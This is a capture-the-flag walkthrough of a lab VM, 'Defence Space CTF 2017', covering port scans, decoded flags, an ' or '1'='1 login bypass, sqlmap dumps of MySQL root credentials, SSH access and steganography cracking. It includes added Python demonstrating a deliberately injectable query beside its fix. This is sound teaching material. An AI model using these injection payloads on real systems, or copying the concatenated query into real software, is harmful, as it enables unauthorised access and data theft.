30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Defence Space CTF: 2017

Location

https://download.vulnhub.com/defencectf2017/DEFENCESPACECTF-2017.ova

Description

The storyline of the CTF is based on real events in Northern Nigeria; however, the author has adopted the code name “Operation Lafia dole”.
The exercise starts from simple information gathering, which is applicable to both military and cyber-based operations, to complex infiltration and encryption, as used by intelligence agencies around the world to pass out secrets.
It has 7 flags to be captured.

Getting started

Because the box runs on a static IP address (192.168.56.20) I need to adjust the VirtualBox network settings first. When that's done I can start with a port/service scan.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.56.20
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-27 18:00 CEST
Nmap scan report for 192.168.56.20
Host is up (0.0025s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.5a
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
443/tcp  open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM...
| ssl-cert: Subject: commonName=Flag3[19c562a36aeb455d093b4f5236f]+[39 39 30]/organizationName=Silex Secure Lab Ltd/stateOrProvinceName=Abuja/countryName=NG
| Not valid before: 2017-01-24T12:54:41
|_Not valid after:  2018-01-24T12:54:41
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2225/tcp open  ssh      OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:f0:08:c9:4d:16:3d:fd:e7:b8:51:d7:b6:57:48:5d (RSA)
|_  256 c2:2b:6e:83:8a:00:67:c2:39:62:16:5e:f9:01:ee:fe (ECDSA)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.47 seconds

FTP, HTTP, HTTPS and SSH on a non-standard port (2225). Let's get a feel for the challenge.

In the source code of the page there is an interesting piece: a script tag whose src attribute is not a path but a base64 string, followed by a comment.

<!-- Scripts -->
      <script src="assets/js/jquery.min.js"></script>
      <script src="assets/js/skel.min.js"></script>
      <script src="assets/js/util.js"></script>
      <script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
      <script src="assets/lafiya.js"></script><![Make sure you stick to intel gathering agent]<!-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyAwIChuZXRkaXNjb3Zlcik=' | base64 -d
Flag 0 (netdiscover)

Uhm….first flag?
Next I examine the JavaScript files. ‘/assets/lafiya.js’ had two things that caught my eye. The first was a comment consisting of hex byte pairs.

/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/
└──╼ $echo '46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a' | xxd -r -p
Flag 2 9a8780281d3e37c597cee7ca58bfd435

Flag number 2. The 32 hex characters look like an MD5 hash, and it reverses to a single word:

9a8780281d3e37c597cee7ca58bfd435 -> Nmap
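Every flag so far has been hidden in page source as either base64 or a run of hex byte pairs, decoded by hand with base64 -d and xxd -r -p. The following is an added example (mine, not part of the original writeup or the CTF) that does the same scan over a whole blob of page source: it pulls out hex runs and base64-looking tokens, decodes them, and keeps only the results that are printable text, so ordinary script paths such as assets/js/jquery.min.js are not reported. The sample source is constructed from the strings quoted on this page; the regex thresholds (8 hex pairs, 16 base64 characters) are my own assumptions.

```python
import base64
import binascii
import re

# Constructed sample input: the encoded strings quoted from this box's page
# source, plus an ordinary script path that must NOT be reported as a flag.
SAMPLE_SOURCE = """
<script src="assets/js/jquery.min.js"></script>
<script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/
<!-- ZmxhZyA0IHthZG1pbi5waHB9 -->
<!-- hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ== -->
"""

# A run of at least eight space-separated hex byte pairs (the xxd -r -p style).
HEX_RUN = re.compile(r"(?:\b[0-9a-fA-F]{2}\b[ \t]*){8,}")
# A base64 token of at least 16 characters that is not part of a path or filename.
B64_TOKEN = re.compile(r"(?<![\w/.+=])[A-Za-z0-9+/]{16,}={0,2}(?![\w/.=])")


def _as_text(raw):
    """Return the decoded bytes as stripped text if they are printable ASCII, else None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text.strip()


def decode_hex_runs(source):
    """(encoding, encoded, decoded) for every hex run that decodes to readable text."""
    found = []
    for m in HEX_RUN.finditer(source):
        raw = bytes.fromhex(re.sub(r"\s", "", m.group(0)))
        text = _as_text(raw)
        if text is not None:
            found.append(("hex", m.group(0).strip(), text))
    return found


def decode_base64_tokens(source):
    """(encoding, encoded, decoded) for every base64 token that decodes to readable text."""
    found = []
    for m in B64_TOKEN.finditer(source):
        token = m.group(0)
        padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue
        text = _as_text(raw)
        if text is not None:
            found.append(("base64", token, text))
    return found


def decode_candidates(source):
    """All decodable hex runs and base64 tokens found in a blob of page source."""
    return decode_hex_runs(source) + decode_base64_tokens(source)


if __name__ == "__main__":
    for kind, enc, dec in decode_candidates(SAMPLE_SOURCE):
        print(f"[{kind}] {enc} -> {dec}")
```

Run it over the saved output of wget -r or a Burp export and the flags come out in one pass; the printable-ASCII filter is what keeps the noise down, since random tokens that happen to be valid base64 almost never decode to clean text.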

The second thing, in the same file, was a comment containing a date, an e-mail address, a maps link and a string that looks very much like a password. Anything like this is worth noting down.

/* Beheaded Air Force   */
/*  There is a big shoe to fill. Lord I need your feet.. 11/08/2014  c.hedima@airforce.mil.ng maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121  Bama1987 */

Next I ran Nikto.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.56.20/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.20
+ Target Hostname:    192.168.56.20
+ Target Port:        80
+ Start Time:         2017-03-27 19:36:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xf7d 0x549619ce6fe2c
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ 7686 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2017-03-27 19:37:10 (GMT2) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Two findings worth following up: phpinfo() is exposed at /info.php, and there is a /phpmyadmin/ directory.

When I connect to the SSH server, the login banner contains another flag.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.56.20 -p 2225
The authenticity of host '[192.168.56.20]:2225 ([192.168.56.20]:2225)' can't be established.
ECDSA key fingerprint is SHA256:8sIalXp1GsXRzq1v9LpWHz84w229mDlUIjrc9Ahm3lU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.20]:2225' (ECDSA) to the list of known hosts.
###############################################################################################
                                        WARNING
                     DHQ:NIG  DSS-NIG DIA-NIG - Authorized Access Only!
      Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
                All actions Will be Closely Monitored and Recorded by Cam7
               Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
53c82eba31f6d416f331de9162ebe997 -> encrypt

Encrypt…..looks like I'm being pointed at the HTTPS server.
Inside the SSL certificate there is another flag, but this time something is appended to it.

19c562a36aeb455d09534f93b4f5236f -> Unit
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '39 39 30' | xxd -r -p
990

Unit + 990 = Unit990
After a few tries treating this as a username, I tried it in the browser as a directory name instead, which gives a login page.

In the source code of that page there is a comment.

<!-- "Every intelligence Analysis system must be rooted in a strong understanding of  agent's access written for." -
ZmxhZyA0IHthZG1pbi5waHB9  -->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA0IHthZG1pbi5waHB9' | base64 -d
flag 4 {admin.php}

At the bottom there was a final comment.

<!--
  //////////////////////////////////////////////////////////////////////////////////////////////////////
// Defence| DIA| FIB | AIRFORCE| NAVY| DSA| client   authenticated connections to 2225 classified     //                       //                                                                                                    //
//                                                                                                    //
//                         .--Entering is a process here                                              //
//                         |              .--hypothetical Base64 Encoded                             //
//                         v                           v                                              //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);                          //
//                                                                                                    //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->

When I follow the clue from the previous flag (admin.php) I get another login screen.
Again I check the source code: the same comment, but with a slight twist.

<!--
  //////////////////////////////////////////////////////////////////////////////////////////////////////
// update() sets the value of a column given a condition                                              //
//                                                                                                    //
//                         .--escaping is automatic here                                              //
//                         |              .--hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==            //
//                         v                           v                                              //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET['id']);                                 //
//                                                                                                    //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==' | base64 -d
Flag 5 {SQL injection}
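The hint is precise about where the hole is: in Db()->update('name', $_GET['newname'])->where(' id = '.$_GET['id']) the SET value is escaped automatically, but the WHERE clause is built by string concatenation of raw input. The following is an added example (mine, not code from the CTF or the writeup) that reproduces that pattern against an in-memory SQLite database, shows the classic ' or '1'='1 payload against the same mistake in a login query, and puts the parameterised fix next to each. Only the admin table's id and code columns come from the sqlmap dump further down; the name/password columns and their values are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the box's 'silex' database.

    The id/code columns mirror the dumped admin table; the name and password
    columns and every value in them are assumptions made for this demo.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, password TEXT, code TEXT)"
    )
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?, ?)",
        [
            (1, "silex", "not-the-real-one", "ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ=="),
            (2, "abuali", "also-made-up", "RGVmYXVsdEAxMg=="),
        ],
    )
    conn.commit()
    return conn


# --- the pattern from the hint ------------------------------------------------
# Db()->update('name', $_GET['newname'])->where(' id = ' . $_GET['id'])
# The SET value goes through a bound parameter ("escaping is automatic here"),
# but the WHERE clause is plain concatenation of user input.

def update_name_vulnerable(conn, newname, id_param):
    sql = "UPDATE admin SET name = ? WHERE id = " + id_param  # injectable
    return conn.execute(sql, (newname,)).rowcount


def update_name_fixed(conn, newname, id_param):
    # Reject anything that is not an integer id (ValueError), then bind both values.
    return conn.execute(
        "UPDATE admin SET name = ? WHERE id = ?", (newname, int(id_param))
    ).rowcount


# --- the same mistake on a login form -----------------------------------------
# This is the shape of query that ' or '1'='1 is written for: both quoted
# strings are closed early and a tautology is appended.

def login_vulnerable(conn, username, password):
    sql = (
        "SELECT id, name, code FROM admin WHERE name = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn, username, password):
    return conn.execute(
        "SELECT id, name, code FROM admin WHERE name = ? AND password = ?",
        (username, password),
    ).fetchall()


BYPASS = "' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("login bypass rows:", login_vulnerable(db, BYPASS, BYPASS))
    print("login fixed rows: ", login_fixed(db, BYPASS, BYPASS))
    print("rows renamed by injected WHERE:", update_name_vulnerable(db, "pwned", "0 or '1'='1'"))
```

With the payload in both fields the vulnerable login query becomes WHERE name = '' or '1'='1' AND password = '' or '1'='1', which is true for every row, so the first row comes back as the "logged in" user; the injected WHERE on the update rewrites every row instead of one. The fixed versions never let input become SQL syntax, which is also why sqlmap finds nothing to work with against them.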

Time to put sqlmap to work. The relevant parts of its output:

available databases [7]:
[*] db_audit
[*] Dhqctf
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] silex
database management system users password hashes:
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
Database: silex
[6 tables]
+--------------+
| admin        |
| categories   |
| customers    |
| formula      |
| home_type    |
| sub_category |
+--------------+
Database: silex
Table: admin
[1 entry]
+----+--------------------------------------+
| id | code                                 |
+----+--------------------------------------+
| 1  | ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ== |
+----+--------------------------------------+
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ==' | base64 -d
flag 6 {Nigairforcecloud}

When I searched my notes for something with ‘airforce’ I noticed I had missed a clue inside a comment I found earlier. There was a piece of code inside that comment that was very interesting.

Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);

Let's try that basic piece of SQL injection (' or '1'='1) on the login page from earlier. The response contains a base64 string:

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RGVmYXVsdEAxMg==' | base64 -d
Default@12

That looks like an invitation to an SSH login.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh abuali@192.168.56.20 -p 2225
###############################################################################################
                                        WARNING
                     DHQ:NIG  DSS-NIG DIA-NIG - Authorized Access Only!
      Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
                All actions Will be Closely Monitored and Recorded by Cam7
               Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
abuali@192.168.56.20's password:
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-39-generic i686)
Last login: Sat Feb 25 21:56:08 2017 from 192.168.56.20
abuali@server1:~$ id
uid=1002(abuali) gid=1002(abuali) groups=1002(abuali)
abuali@server1:/home/silex/OperationLafia$ uname -a
Linux server1 4.8.0-39-generic #42-Ubuntu SMP Mon Feb 20 11:46:49 UTC 2017 i686 i686 i686 GNU/Linux
abuali@server1:/home/silex/OperationLafia$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety

After some time inside this box I started to think this was a waste of time and that I had got side-tracked. Time to return to the admin login page and inject some SQLi there.

Fun that I got access, but this system didn't give me any direction on how to go on. It felt like a dead end. Because I had gathered a lot of information, I put everything I found into a list and ran it through dirsearch.

┌─[n13mant@planetmars]─[~/dirsearch]
└──╼ $python3 dirsearch.py -u http://192.168.56.20/ -e php,hmtl -x 301,404,405 -w ~/Desktop/words.dic
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php, hmtl | Threads: 10 | Wordlist size: 277315
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-30_16-49-18.log
Target: http://192.168.56.20/
[16:49:18] Starting:
[16:49:18] 200 -    4KB - /
[16:49:18] 200 -    4KB - /
[.....SNIP.....]
[16:58:23] 401 -  460B  - /Nigairforcecloud
[.....SNIP.....]
[17:12:11] 200 -    4KB - /
Task Completed

401….restricted access. Bummer. But the funny thing is, when I use port 443 I don't need any credentials at all: the gate is wide open. Worth remembering: access controls placed inside one Apache <VirtualHost> block do not carry over to another, so a directory that asks for a password on port 80 may be unprotected on port 443, and every listener needs its own check.

On entering I get flag number 7, which should be the end of this funny but strange CTF.

3aa652f41d8b4a23e17937149c784868 -> widgets

But why would there be a clue inside the last and final flag? Because there is a button on the left of the dashboard called ‘widgets’, I guess I'm not done yet.

There is a sound file and an image to download. As there is nothing else here and the clue pointed directly to this page, I guess there is some steganography in place. Unfortunately the hidden data is password-protected.
Because there is no clue where the password can be found, I need to build a wordlist. This CTF has a story to tell, so there is a lot of text spread over the files on the website. To make the wordlist I copy the content of every file into one text file and, with ‘sort’ and ‘grep’, filter it down to unique strings of 5 characters or more. I did it this way because CeWL by default keeps only alphabetic words, so a token like Bama1987 would never make it into its list. With this list I brute-forced both files.

┌─[n13mant@planetmars]─[~/stegbrute]
└──╼ $python steg_brute.py -b -d ~/Desktop/words.dic -f ~/Desktop/Alfajet106.wav
 [i] Searching...
 53%|############################                                                  |
 wrote extracted data to "/home/n13mant/Desktop/Alfajet106_flag.txt".
 [+] Information obtained with password: Bama1987
Imam Abubakar Shekau
Mobile Number : 091778383990
Email:abubakar.shekau@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Age : 40
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711776
Habibu Yusuf (a.k.a Asalafi)
Mobile Number : 091778383910
Email:abubakar.HabibuYusuf1@arimblog.com
Location : Sambisa forest
Borno state
Height : 4.0
Age : 25
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711777
Khalid Albarnawai
Mobile Number : 091778383992
Email:abubakar.khalidbaba@arimblog
Location : Maiduguri, Borno State, Nigeria
Height : 7.0
DOB : 1976
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711778
Momodu Bama
Mobile Number : 091778383993
Email:bamamomodu@arimblog
Location : Alfata street, Behind A.g Station Borno state
Height : 7.0
Language : English , Kanuri, Hausa.
Religion :
Bank Account : 08878711779

Guess that is it. Nothing really marks the end.

Conclusion

This CTF was a strange one at best. No real techniques were needed and it felt more like a wild goose chase. The creators really wanted to tell a story, but missed out on the challenging part. I always enjoy a themed CTF, but this one was a bit too much theme.

1 thought on “Defence Space CTF: 2017”

  1. I had fun with it, because I discovered exactly what I was looking for.
    You've ended my four-day lengthy hunt! God bless you man. Have a great day.
    Bye
